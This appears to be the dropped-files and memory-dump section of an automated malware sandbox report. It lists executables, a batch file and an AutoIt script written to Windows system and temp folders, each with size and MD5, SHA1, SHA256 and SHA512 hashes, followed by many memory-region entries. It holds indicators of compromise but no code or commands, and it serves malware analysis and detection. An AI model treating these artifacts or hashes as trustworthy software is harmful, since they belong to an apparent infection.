ed96a0b384bb97e33159bc7f0c51146a338645fd678c6d399620d665b26e17413f1290a9d2698b38c6d10e66d39958c31e5deb5fb4a471ab4f7eff4df5111b35

Download Submit
C:\Windows\System32\Client.exe

Filesize
3.1MB

MD5
4a603ec4e3c5a21400eaabac7c6401c6

SHA1
23b446721eacd0b6796407ca20bd1e01355ab41f

SHA256
566ba756b7fc2174fc195c05d9e0a36aa706e4ce397f890488227b7d0ad4ad7c

SHA512
070a5dd14bce16ba58eb65f3b3143fc7890f0e34f2ed7f3a1930e3fa8454ebcf615b43c819f16f4fc494676443bd409a3a57e8fe6e8f39ab02df5ace497eaea0

Download Submit
C:\Windows\winqlsdrvcs.exe

Filesize
14KB

MD5
686899bd841d603551a0429d09cb906c

SHA1
c827bc460766c0c39fa9ad27918fb0f409379eb3

SHA256
483142a79ce1fce6474da5dcfeea48104eda46a960c7eb9b9581d555dd6cfc77

SHA512
850919af70b4b0548fc985b49fa35f5613c31bde6fb46b19753b181c25e0251c52b121a26459c230a969e8ae23fb1dccd547be6a34d2a73dfe4e0d31e6874b76

Download Submit
C:\kkxqbh.bat

Filesize
77B

MD5
13877fe8fb3b5604693f098ce86d1711

SHA1
9bc95df3c0a12eaabc1e00460d7d0aae8c15f35f

SHA256
f2db62c42b700748f5b2f035dbe8f870cc6cab0c8d1c8721cbe18fa6438ac105

SHA512
049d6d0abecd59adebd20250316836b53cd15b7351eec0d1ed20b52e39ae9fa0bdfb23c5c141c89bf633ac402cf1f443c3f3d6faf97173eda4fecd4a79fd5443

Download Submit
\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe

Filesize
2.2MB

MD5
8358f1dd3fc6a236434e9eff45f1a2d8

SHA1
7a0007ca44015af841015f0775752fede3c167e1

SHA256
1f4436584109c2fd0240f92a4d978c6ec021268505515f1e4cf27938db53e849

SHA512
477325120bcdc745bab552eef142100d12d6c46679b979773e938d79c528cc4b2de6412ac621a2d8d0773d3d35663e1e0950deb9b4183fcf783fc6273918f7e7

Download Submit
\Users\Admin\AppData\Local\Temp\FUT.au3

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
\Users\Admin\AppData\Local\Temp\SIG.EXE

Filesize
3.4MB

MD5
64fb7bebeb2e58cdeef83cc42f624f1b

SHA1
242307f03a7d9dc7c76737246d710bf10efe998f

SHA256
0965f85212e3c5fc2cd3e14499fd65b90c5aac7029a3d0afd61525284c5dc88f

SHA512
ec21a3064b68dd87a13e5128cc279ed3ea92c3aa26b245aaf7211ba3cf5bf32c71476b679d0c7a9b94035e18bdb9dea1fe8eb053f7c30d791a026ba4e5398cec

Download Submit
\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe

Filesize
7.8MB

MD5
636ea646281c99d3d05cdefdca29cf5e

SHA1
77b6e50b8866f7b41d678995b8d448237edcddef

SHA256
01dde6eab064a347e1b0b8dc3074e7ac96203e1bbd1bec7cddf4b6fdfadee61c

SHA512
f63f21d87a7204967b6de980f3385cfc48c6a956d6d071005e593b40886d5292b8ec62c604c76200f93136db81f5ee3626f1663b7ee7afc1a8f0fa3e37c64350

Download Submit
\Users\Admin\AppData\Local\Temp\a\oiii.exe

Filesize
291KB

MD5
7562a8f108271b96994b95ea35494f7f

SHA1
42bf054fd00311f2a47f89c0c1d5674ff485ac71

SHA256
0eda07e22619ffa11c789a1ebf945d8f8510a210dc7b1c898a9a09e706ad4b4c

SHA512
e43076d160b33bd26845f7144e848b729d5fd329045835ced8d715dbcaff3fc0ca3bfad3f736a467c2835517fd548eee4aca8ec30a8655ec79777d5628e54259

Download Submit
\Users\Admin\AppData\Local\Temp\is-D77UB.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
\Users\Admin\AppData\Local\Temp\is-D77UB.tmp\_isetup\_isdecmp.dll

Filesize
13KB

MD5
a813d18268affd4763dde940246dc7e5

SHA1
c7366e1fd925c17cc6068001bd38eaef5b42852f

SHA256
e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64

SHA512
b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

Download Submit
\Users\Admin\AppData\Local\Temp\is-D77UB.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-VONQV.tmp\crt.tmp

Filesize
680KB

MD5
2b1448b48874851ff092b32dae44cfea

SHA1
a156c72c6f87817a3c88a0232bbafa39aa36301b

SHA256
08d83cc7c62e673495c8e18b6ff1e7600397c7ff9c3bd3b580678d50fcf3e950

SHA512
923195ffefc70808c1f63688e40500021b4a75e660c00dd110e08a6910f8ac85aef0736116f76096fffb34966aafff1bb3c5c2d6ff809951a94b47e2625bb3a7

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
memory/240-266-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-258-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-220-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-214-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-203-0x00000000000B0000-0x0000000000124000-memory.dmp

Filesize
464KB

Download
memory/240-218-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-204-0x0000000002000000-0x00000000020DC000-memory.dmp

Filesize
880KB

Download
memory/240-205-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-212-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-210-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-224-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-216-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-226-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-264-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-228-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-230-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-208-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-232-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-234-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-236-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-206-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-238-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-268-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-240-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-242-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-244-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-246-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-250-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-252-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-255-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-256-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-222-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-248-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-262-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/240-260-0x0000000002000000-0x00000000020D7000-memory.dmp

Filesize
860KB

Download
memory/2496-16723-0x0000000000F90000-0x0000000001038000-memory.dmp

Filesize
672KB

Download
memory/2496-16724-0x0000000000580000-0x00000000005CC000-memory.dmp

Filesize
304KB

Download
memory/2496-16725-0x0000000000A70000-0x0000000000AA4000-memory.dmp

Filesize
208KB

Download
memory/2496-16726-0x0000000000AA0000-0x0000000000AD4000-memory.dmp

Filesize
208KB

Download
memory/2900-17071-0x0000000000CE0000-0x0000000000CF8000-memory.dmp

Filesize
96KB

Download
memory/2956-6504-0x000007FEF5B90000-0x000007FEF657C000-memory.dmp

Filesize
9.9MB

Download
memory/2956-16903-0x0000000140000000-0x0000000140005000-memory.dmp

Filesize
20KB

Download
memory/2956-1-0x00000000001A0000-0x00000000001A8000-memory.dmp

Filesize
32KB

Download
memory/2956-16475-0x0000000140000000-0x0000000140005000-memory.dmp

Filesize
20KB

Download
memory/2956-2-0x000007FEF5B90000-0x000007FEF657C000-memory.dmp

Filesize
9.9MB

Download
memory/2956-0-0x000007FEF5B93000-0x000007FEF5B94000-memory.dmp

Filesize
4KB

Download
memory/2956-16476-0x0000000140000000-0x0000000140005000-memory.dmp

Filesize
20KB

Download
memory/2956-449-0x000007FEF5B93000-0x000007FEF5B94000-memory.dmp

Filesize
4KB

Download
memory/2956-16904-0x0000000140000000-0x0000000140005000-memory.dmp

Filesize
20KB

Download
memory/3000-16817-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3288-17207-0x00000000011D0000-0x0000000001208000-memory.dmp

Filesize
224KB

Download
memory/3288-17208-0x00000000002C0000-0x00000000002C6000-memory.dmp

Filesize
24KB

Download
memory/3316-15518-0x0000000000400000-0x000000000062C000-memory.dmp

Filesize
2.2MB

Download
memory/3512-16779-0x0000000001140000-0x0000000001360000-memory.dmp

Filesize
2.1MB

Download
memory/3652-16477-0x0000000140000000-0x0000000140004248-memory.dmp

Filesize
16KB

Download
memory/4008-17196-0x0000000000030000-0x000000000007E000-memory.dmp

Filesize
312KB

Download
memory/4036-16806-0x0000000000930000-0x0000000000938000-memory.dmp

Filesize
32KB

Download
memory/4180-16455-0x0000000000880000-0x0000000000BA4000-memory.dmp

Filesize
3.1MB

Download
memory/4428-17181-0x000000001B310000-0x000000001B5F2000-memory.dmp

Filesize
2.9MB

Download
memory/4428-17182-0x0000000002760000-0x0000000002768000-memory.dmp

Filesize
32KB

Download
memory/4604-16468-0x0000000000CB0000-0x0000000000FD4000-memory.dmp

Filesize
3.1MB

Download
memory/4608-15324-0x0000000003620000-0x000000000384C000-memory.dmp

Filesize
2.2MB

Download
memory/4608-15466-0x0000000003620000-0x000000000384C000-memory.dmp

Filesize
2.2MB

Download
memory/4828-16784-0x0000000000E70000-0x0000000000E78000-memory.dmp

Filesize
32KB

Download
memory/5220-15326-0x0000000004B20000-0x0000000004BBE000-memory.dmp

Filesize
632KB

Download
memory/5220-15327-0x0000000000CC0000-0x0000000000D0C000-memory.dmp

Filesize
304KB

Download
memory/5220-12992-0x00000000000C0000-0x0000000000198000-memory.dmp

Filesize
864KB

Download
memory/5220-13006-0x0000000004C30000-0x0000000004D46000-memory.dmp

Filesize
1.1MB

Download
memory/7268-16742-0x0000000004120000-0x0000000004150000-memory.dmp

Filesize
192KB

Download
memory/7268-16740-0x0000000000AB0000-0x0000000000AF8000-memory.dmp

Filesize
288KB

Download
memory/7268-16741-0x0000000000A70000-0x0000000000AA0000-memory.dmp

Filesize
192KB

Download
memory/7268-16739-0x0000000000CB0000-0x0000000000D20000-memory.dmp

Filesize
448KB

Download
memory/7508-15546-0x0000000000390000-0x000000000039C000-memory.dmp

Filesize
48KB

Download
memory/7712-16576-0x0000000019E60000-0x000000001A142000-memory.dmp

Filesize
2.9MB

Download
memory/7712-16577-0x00000000010F0000-0x00000000010F8000-memory.dmp

Filesize
32KB

Download
memory/7848-15325-0x0000000000400000-0x000000000062C000-memory.dmp

Filesize
2.2MB

Download
memory/7848-15364-0x0000000000400000-0x000000000062C000-memory.dmp

Filesize
2.2MB

Download
memory/7928-16756-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/8380-6524-0x00000000001F0000-0x0000000000200000-memory.dmp

Filesize
64KB

Download
memory/8424-6530-0x0000000000140000-0x0000000000158000-memory.dmp

Filesize
96KB

Download
memory/9084-6603-0x00000000009D0000-0x0000000000AAC000-memory.dmp

Filesize
880KB

Download
memory/9084-6602-0x0000000000D70000-0x0000000000DE4000-memory.dmp

Filesize
464KB

Download
memory/9108-16562-0x000000001BB00000-0x000000001BDE2000-memory.dmp

Filesize
2.9MB

Download
memory/9108-16563-0x0000000002200000-0x0000000002208000-memory.dmp

Filesize
32KB

Download